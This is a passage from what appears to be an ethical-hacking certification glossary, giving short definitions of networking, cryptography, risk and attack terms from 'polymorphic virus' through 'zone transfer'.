polymorphic virus   Malicious code that uses a polymorphic engine to mutate while keeping the original algorithm intact; the code changes itself each time it runs, but the function of the code will not change.

Point-to-Point Protocol (PPP)   Provides router-to-router or host-to-network connections over asynchronous and synchronous circuits.

Point-to-Point Tunneling Protocol (PPTP)   A VPN tunneling protocol with encryption. PPTP connects two nodes in a VPN by using one TCP port for negotiation and authentication and one IP protocol for data transfer.

Port Address Translation (PAT)   A NAT method in which multiple internal hosts, using private IP addressing, can be mapped through a single public IP address using the session IDs and port numbers. An internal global IP address can support in excess of 65,000 concurrent TCP and UDP connections.

port knocking   Another term for firewalking—the method of externally testing ports on a firewall by generating a connection attempt on each port, one by one.

port redirection   The process of directing a protocol from one port to another.

port scanning   The process of using an application to remotely identify open ports on a system (for example, whether systems allow connections through those ports).

POST   An HTTP command to transmit text to a web server for processing. This is the opposite of an HTTP GET.

Post Office Protocol 3 (POP3)   An Application layer protocol used by local e-mail clients to retrieve e-mail from a remote server over a TCP/IP connection.

Presentation layer   Layer 6 of the OSI reference model. The Presentation layer ensures information sent by the Application layer of the sending system will be readable by the Application layer of the receiving system.

Pretty Good Privacy (PGP)   A data encryption/decryption program often used for e-mail and file storage.

private cloud   A cloud model operated solely for a single organization (a.k.a. single-tenant environment) and is usually not pay-as-you-go.

private key   The secret portion of an asymmetric key pair typically used to decrypt or digitally sign data. The private key is never shared and is always used for decryption, with one notable exception: the private key is used to encrypt the digital signature.

private network address   A nonroutable IP address range intended for use only within the confines of a single organization, falling within the predefined range of 10.0.0.0, 172.16–31.0.0, or 192.168.0.0.

promiscuous mode   A configuration of a network card that makes the card pass all traffic it receives to the central processing unit rather than just frames addressed to it—a feature normally used for packet sniffing and bridged networking for hardware virtualization. Windows machines use WinPcap for this; Linux uses libcap.

protocol   A formal set of rules describing data transmission, especially across a network. A protocol determines the type of error checking, the data compression method, how the sending device will indicate completion, how the receiving device will indicate the message was received, and so on.

protocol stack   A set of related communications protocols operating together as a group to address communication at some or all of the seven layers of the OSI reference model.

proxy server   A device set up to send a response on behalf of an end node to the requesting host. Proxies are generally used to obfuscate the host from the Internet.

public cloud   A cloud model where services are provided over a network that is open for public use (such as the Internet).

public key   The public portion of an asymmetric key pair typically used to encrypt data or verify signatures. Public keys are shared and are used to encrypt messages.

public key infrastructure (PKI)   A set of hardware, software, people, policies, and procedures needed to create, manage, distribute, use, store, and revoke digital certificates.

pure insider   An employee with all the rights and access associated with being employed by the company.

purple team   A single team of security professionals who perform cooperative vulnerability and penetration assessments (CVPA).

qualitative analysis   A nonnumerical, subjective risk evaluation. This is used with qualitative assessment (an evaluation of risk that results in ratings of none, low, medium, or high for the probability).

quality of service (QoS)   A defined measure of service within a network system—administrators may assign a higher QoS to one host, segment, or type of traffic.

quantitative risk assessment   Calculations of two components of risk (R): the magnitude of the potential loss (L), and the probability (P) that the loss will occur.

queue   A backlog of packets stored in buffers and waiting to be forwarded over an interface.

RAID (Redundant Array of Independent Disks)   Formerly Redundant Array of Inexpensive Disks, RAID is a technology that provides increased storage functions and reliability through redundancy. This is achieved by combining multiple disk drive components into a logical unit, where data is distributed across the drives in one of several ways, called RAID levels.

reconnaissance   The steps taken to gather evidence and information on the targets you want to attack.

remote access   Access by information systems (or users) communicating from outside the information system security perimeter.

remote procedure call (RPC)   A protocol that allows a client computer to request services from a server and the server to return the results.

replay attack   An attack where the hacker repeats a portion of a cryptographic exchange in hopes of fooling the system into setting up a communications channel.

request for comments (RFC)   A series of documents and notes on standards used or proposed for use on the Internet; each is identified by a number.

reverse lookup; reverse DNS lookup   Used to find the domain name associated with an IP address; the opposite of a DNS lookup.

reverse social engineering   A social engineering attack that manipulates the victim into calling the attacker for help.

RID   Resource identifier. This is the last portion of the SID that identifies the user to the system in Windows. An RID of 500 identifies the administrator account.

Rijndael   An encryption standard designed by Joan Daemen and Vincent Rijmen. This was chosen by a NIST contest to be the Advanced Encryption Standard (AES).

ring topology   A networking configuration where all nodes are connected in a circle with no terminated ends on the cable.

risk   The potential for damage to or loss of an IT asset.

risk acceptance   An informed decision to accept the potential for damage to or loss of an IT asset.

risk assessment   An evaluation conducted to determine the potential for damage to or loss of an IT asset.

risk avoidance   A decision to reduce the potential for damage to or loss of an IT asset by taking some type of action.

risk transference   Shifting responsibility from one party to another—for example, through purchasing an insurance policy.

rogue access point   A wireless access point that either has been installed on a secure company network without explicit authorization from a local network administrator or has been created to allow a hacker to conduct a man-in-the-middle attack.

role-based access control   An approach to restricting system access to authorized users in which roles are created for various job functions. The permissions to perform certain operations are assigned to specific roles. Members of staff (or other system users) are assigned particular roles, and through those role assignments they acquire the permissions to perform particular system functions.

rolling code   The code used by a key fob to unlock (and, in some cases, start) a car is called a rolling (or hopping) code. Stealing this code and reusing it is referred to as a rolling code attack.

rootkit   A set of tools (applications or code) that enables administrator-level access to a computer or computer network and is designed to obscure the fact that the system has been compromised. Rootkits are dangerous malware entities that provide administrator control of machines to attackers and are difficult to detect and remove.

roots of trust (RoT)   A set of functions within the trusted computing module that are always trusted by the computer’s operating system (OS).

route   1. The path a packet travels to reach the intended destination. Each individual device along the path traveled is called a hop. 2. Information contained on a device containing instructions for reaching other nodes on the network. This information can be entered dynamically or statically.

routed protocol   A protocol defining packets that are able to be routed by a router.

router   A device that receives and sends data packets between two or more networks; the packet headers and a forwarding table provide the router with the information necessary for deciding which interface to use to forward packets.

Routing Information Protocol (RIP)   A distance-vector routing protocol that employs the hop count as a routing metric. The “hold down time,” used to define how long a route is held in memory, is 180 seconds. RIP prevents routing loops by implementing a limit on the number of hops allowed in a path from the source to a destination. The maximum number of hops allowed for RIP is 15. This hop limit, however, also limits the size of networks that RIP can support. A hop count of 16 is considered an infinite distance and is used to deprecate inaccessible, inoperable, or otherwise undesirable routes in the selection process.

Routing Protocol   A standard developed to enable routers to exchange messages containing information about routes to reach subnets in the network.

rule-based access control   A set of rules defined by a system administrator that indicates whether access is allowed or denied to resource objects.

RxBoot   A limited-function version of the Internetworking Operating System (IOS), held in read-only memory in some earlier models of Cisco devices, capable of performing several seldom-needed low-level functions such as loading a new IOS into Flash memory to recover Flash if corrupted or deleted.

SaaS   Software as a Service. A type of cloud computing used as a software distribution model.

SAM   The Security Accounts Manager file in Windows stores all the password hashes for the system.

Sarbanes-Oxley Act (SOX)   SOX was created to make corporate disclosures more accurate and reliable in order to protect the public and investors from shady behavior. There are 11 titles within SOX.

scope creep   The change or growth of a project’s scope.

script kiddie   A derogatory term used to describe an attacker, usually new to the field, who uses simple, easy-to-follow scripts or programs developed by others to attack computer systems and networks and deface websites.

secure channel   A means of exchanging information from one entity to another using a process that does not provide an attacker the opportunity to reorder, delete, insert, or read information.

Secure Multipurpose Mail Extension (S/MIME)   A standard for encrypting and authenticating MIME data; used primarily for Internet e-mail.

Secure Sockets Layer (SSL)   A protocol that uses a private key to encrypt data before transmitting confidential documents over the Internet; widely used on e-commerce, banking, and other sites requiring privacy.

security breach or security incident   The exploitation of a security vulnerability.

security bulletins   An announcement, typically from a software vendor, of a known security vulnerability in a program; often the bulletin contains instructions for the application of a software patch.

security by obscurity   A principle in security engineering that attempts to use anonymity and secrecy (of design, implementation, and so on) to provide security; the footprint of the organization, entity, network, or system is kept as small as possible to avoid interest by hackers. The danger is that a system relying on security by obscurity may have theoretical or actual security vulnerabilities, but its owners or designers believe the flaws are not known.

security controls   Safeguards or countermeasures to avoid, counteract, or minimize security risks.

security defect   An unknown deficiency in software or some other product that results in a security vulnerability being identified.

security incident response team (SIRT)   A group of experts that handles computer security incidents.

security kernel   The central part of a computer or communications system hardware, firmware, and software that implements the basic security procedures for controlling access to system resources.

segment   A section or subset of the network. Often a router or other routing device provides the endpoint of the segment.

separation of duties   The concept of having more than one person required to complete a task.

Serial Line Internet Protocol (SLIP)   A protocol for exchanging packets over a serial line.

Service Oriented Architecture (SOA)   An API that makes it easier for application components to cooperate and exchange information on systems connected over a network: it’s designed to allow software components to deliver information directly to other components over a network.

service set identifier (SSID)   A value assigned to uniquely identify a single wide area network (WAN) in wireless LANs. SSIDs are broadcast by default and are sent in the header of every packet. SSIDs provide no encryption or security.

service level agreements (SLAs)   A part of a service contract where the level of service is formally defined; may be required as part of the initial pen test agreements.

session hijacking   An attack in which a hacker steps between two ends of an already established communication session and uses specialized tools to guess sequence numbers to take over the channel.

session splicing   A method used to prevent IDS detection by dividing the request into multiple parts that are sent in different packets.

sheepdip   A stand-alone computer, kept off the network, that is used for scanning potentially malicious media or software.

shoulder surfing   Looking over an authorized user’s shoulder in order to steal information (such as authentication information).

shrink-wrap code attacks   Attacks that take advantage of the built-in code and scripts most off-the-shelf applications come with.

SID   Security identifier. The method by which Windows identifies user, group, and computer accounts for rights and permissions.

sidejacking   A hacking method for stealing the cookies used during a session build and replaying them for unauthorized connection purposes.

signature scanning   A method for detecting malicious code on a computer where the files are compared to signatures of known viruses stored in a database.

sign-in seal   An e-mail protection method using a secret message or image that can be referenced on any official communication with the site; if an e-mail is received without the image or message, the recipient knows it is not legitimate.

Simple Mail Transfer Protocol (SMTP)   An Application layer protocol for sending electronic mail between servers.

Simple Network Management Protocol (SNMP)   An Application layer protocol for managing devices on an IP network.

Simple Object Access Protocol (SOAP)   Used for exchanging structured information, such as XML-based messages, in the implementation of web services.

single loss expectancy (SLE)   The monetary value expected from the occurrence of a risk on an asset. It is mathematically expressed as

single loss expectancy (SLE) = asset value (AV) × exposure factor (EF)

where EF is represented in the impact of the risk over the asset, or percentage of asset lost. As an example, if the AV is reduced by two-thirds, the exposure factor value is 0.66. If the asset is completely lost, the EF is 1.0. The result is a monetary value in the same unit as the SLE is expressed.

site survey   An inspection of a place where a company or individual proposes to work, to gather the necessary information for a design or risk assessment.

smartcard   A card with a built-in microprocessor and memory used for identification or financial transactions. The card transfers data to and from a central computer when inserted into a reader.

smishing   An attack using text messaging, where a user is tricked into downloading malware onto his cellular phone or other mobile device.

Smurf attack   A denial-of-service attack where the attacker sends a ping to the network’s broadcast address from the spoofed IP address of the target. All systems in the subnet then respond to the spoofed address, eventually flooding the device.

sniffer   Computer software or hardware that can intercept and log traffic passing over a digital network.

SOA record   Start of Authority record. This record identifies the primary name server for the zone. The SOA record contains the hostname of the server responsible for all DNS records within the namespace, as well as the basic properties of the domain.

social engineering   A nontechnical method of hacking. Social engineering is the art of manipulating people, whether in person (human based) or via computing methods (computer based), into providing sensitive information.

source routing   A network traffic management technique designed to allow applications to specify the route a packet will take to a destination, regardless of what the route tables between the two systems say.

spam   An electronic version of junk mail. Unsolicited commercial e-mail sent to numerous recipients.

spoofing   A method of falsely identifying the source of data packets; often used by hackers to make it difficult to trace where an attack originated.

spyware   A type of malware that covertly collects information about a user.

stateful packet filtering   A method of network traffic filtering that monitors the entire communications process, including the originator of the session and from which direction it started.

steganography   The art and science of creating a covert message or image within another message, image, audio, or video file.

stream cipher   A symmetric key cipher where plain-text bits are combined with a pseudorandom cipher bit stream (keystream), typically by an exclusive-or (XOR) operation. In a stream cipher, the plain-text digits are encrypted one at a time, and the transformation of successive digits varies during the encryption.

suicide hacker   A hacker who aims to bring down critical infrastructure for a “cause” and does not worry about the penalties associated with his actions.

sybil attack   An IoT DoS attack using multiple forged identities to create the illusion of traffic congestion, which affects everyone else in the local IoT network.

symmetric algorithm   A class of algorithms for cryptography that use the same cryptographic key for both decryption and encryption.

symmetric encryption   A type of encryption where the same key is used to encrypt and decrypt the message.

SYN attack   A type of denial-of-service attack where a hacker sends thousands of SYN packets to the target with spoofed IP addresses.

SYN flood attack   A type of attack used to deny service to legitimate users of a network resource by intentionally overloading the network with illegitimate TCP connection requests. SYN packets are sent repeatedly to the target, but the corresponding SYN/ACK responses are ignored.

syslog   A protocol used for sending and receiving log information for nodes on a network.

TACACS   Terminal Access Controller Access-Control System. A remote authentication protocol that is used to communicate with an authentication server commonly used in Unix networks.

target of engagement (TOE)   The software product or system that is the subject of an evaluation.

telnet   A protocol used in networking to provide bidirectional, interactive, text-oriented communication facility using a virtual terminal connection. Commands entered locally are executed on the remote system.

Temporal Key Integrity Protocol (TKIP)   A security protocol used in IEEE 802.11i to replace WEP without the requirement to replace legacy hardware.

third party   A person or entity indirectly involved in a relationship between two principals.

threat   Any circumstance or event with the potential to adversely impact organizational operations, organizational assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

three-way (TCP) handshake   A three-step process computers execute to negotiate a connection with one another. The three steps are SYN, SYN/ACK, and ACK.

tiger team   A group of people, gathered together by a business entity, working to address a specific problem or goal.

time bomb   A program designed to execute at a specific time to release malicious code onto the computer system or network.

time to live (TTL)   A limit on the amount of time or number of iterations or transmissions in computer and network technology a packet can experience before it will be discarded.

timestamping   Recording the time, normally in a log file, when an event happens or when information is created or modified.

Tini   A small Trojan program that listens on port 777.

traceroute   A utility that traces a packet from your computer to an Internet host, showing how many hops the packet takes to reach the host and how long the packet requires to complete the hop.

Transmission Control Protocol (TCP)   A connection-oriented, Layer 4 protocol for transporting data over network segments. TCP is considered reliable because it guarantees delivery and the proper reordering of transmitted packets. This protocol is used for most long-haul traffic on the Internet.

Transport Layer Security (TLS)   A standard for encrypting e-mail, web pages, and other stream-oriented information transmitted over the Internet.

trapdoor function   A function that is easy to compute in one direction yet believed to be difficult to compute in the opposite direction (finding its inverse) without special information, called the trapdoor. This function is widely used in cryptography.

Trojan horse   A non-self-replicating program that appears to have a useful purpose but in reality has a different, malicious purpose.

trusted computer base (TCB)   The set of all hardware, firmware, and/or software components critical to IT security. Bugs or vulnerabilities occurring inside the TCB might jeopardize the security properties of the entire system.

Trusted Computer System Evaluation Criteria (TCSEC)   A U.S. Department of Defense (DoD) standard that sets basic requirements for assessing the effectiveness of computer security controls built into a computer system.

tumbling   The act of using numerous electronic serial numbers on a cell phone until a valid number is located.

tunnel   A point-to-point connection between two endpoints created to exchange data. Typically a tunnel is either an encrypted connection or a connection using a protocol in a method for which it was not designed. An encrypted connection forms a point-to-point connection between sites in which only the sender and the receiver of the data see it in a clear state.

tunneling   Transmitting one protocol encapsulated inside another protocol.

tunneling virus   A self-replicating malicious program that attempts installation beneath antivirus software by directly intercepting the interrupt handlers of the operating system to evade detection.

Unicode   An international encoding standard, working within multiple languages and scripts, that represents each letter, digit, or symbol with a unique numeric value that applies across different platforms.

Uniform Resource Locator (URL)   A string that represents the location of a web resource—most often a website.

User Datagram Protocol (UDP)   A connectionless, Layer 4 transport protocol. UDP is faster than TCP but offers no reliability. A best effort is made to deliver the data, but no checks and verifications are performed to guarantee delivery. Therefore, UDP is termed a connectionless protocol. UDP is simpler to implement and is used where a small amount of packet loss is acceptable, such as for streaming video and audio.

Vehicle Ad Hoc Network (VANET)   The communications network used by IoT-enabled vehicles; refers to the spontaneous creation of a wireless network for vehicle-to-vehicle (V2V) data exchange.

Videocipher II Satellite Encryption System   The brand name of analog scrambling and de-scrambling equipment for cable and satellite television, invented primarily to keep consumer television receive-only (TVRO) satellite equipment from receiving TV programming except on a subscription basis.

virtual local area network (VLAN)   Devices, connected to one or more switches, grouped logically into a single broadcast domain. Administrators can divide the devices connected to the switches into multiple VLANs without requiring separate physical switches.

virtual private network (VPN)   A technology that establishes a tunnel to create a private, dedicated, leased-line network over the Internet. The data is encrypted so it’s readable only by the sender and receiver. Companies commonly use VPNs to allow employees to connect securely to the company network from remote locations.

virtualization   A practice whereby the physical aspects of the hardware are virtually presented to operating systems in a way that allows one or more virtual machines (with their own operating systems) to run simultaneously on the same physical box.

virus   A malicious computer program with self-replication capabilities that attaches to another file and moves with the host from one computer to another.

virus hoax   An e-mail message that warns users of a nonexistent virus and encourages them to pass on the message to other users.

vishing   Social engineering attacks using a phone.

vulnerability   Weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source.

vulnerability assessment   Formal description and evaluation of the vulnerabilities in an information system.

vulnerability management   The cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities.

vulnerability scanning   Sending packets or requests to another system to gain information to be used to identify weaknesses and protect the system from attacks.

war chalking   Drawing symbols in public places to alert others to an open Wi-Fi network. War chalking can include the SSIDs, administrative passwords to APs, and other information.

war dialing   The act of dialing all numbers within an organization to discover open modems.

war driving   The act of searching for Wi-Fi wireless networks by a person in a moving vehicle, using a portable device.

warm site   An environmentally conditioned workspace partially equipped with IT and telecommunications equipment to support relocated IT operations in the event of a significant disruption.

web spider   A program designed to browse websites in an automated, methodical manner. Sometimes these programs are used to harvest information from websites, such as e-mail addresses.

white-box testing   A pen testing method where the attacker knows all information about the internal network. It is designed to simulate an attack by a disgruntled systems administrator or similar level.

Whois   A query and response protocol widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address, or an autonomous system.

wide area network (WAN)   Two or more LANs connected by a high-speed line across a large geographical area.

Wi-Fi   A term trademarked by the Wi-Fi Alliance, used to define a standard for devices to use to connect to a wireless network.

Wi-Fi Protected Access (WPA)   Provides data encryption for IEEE 802.11 wireless networks so data can be decrypted only by the intended recipients.

Wired Equivalent Privacy (WEP)   A security protocol for wireless local area networks defined in the 802.11b standard; intended to provide the same level of security as a wired LAN. WEP is not considered strong security, although it does authenticate clients to access points, encrypt information transmitted between clients and access points, and check the integrity of each packet exchanged.

wiretapping   The monitoring of telephone or Internet conversations, typically by covert means.

worm   A self-replicating, self-propagating, self-contained program that uses networking mechanisms to spread itself.

wrapper   Software used to bind a Trojan and a legitimate program together so the Trojan will be installed when the legitimate program is executed.

XOR operation   A mathematical operation requiring two binary inputs: if the inputs match, the output is a 0; otherwise, it is a 1.

Zenmap   A Windows-based GUI version of Nmap.

zero subnet   In a classful IPv4 subnet, this is the network number with all binary 0s in the subnet part of the number. When written in decimal, the zero subnet has the same number as the classful network number.

zero-day attack   An attack carried out on a system or application before the vendor becomes aware and before a patch or fix action is available to correct the underlying vulnerability.

zombie   A computer system that performs tasks dictated by an attacker from a remote location. Zombies may be active or idle, and owners of the systems generally do not know their systems are compromised.

zone transfer   A type of DNS transfer where all records from an SOA are transmitted to the requestor. Zone transfers have two options: full (opcode AXFR) and incremental (IXFR).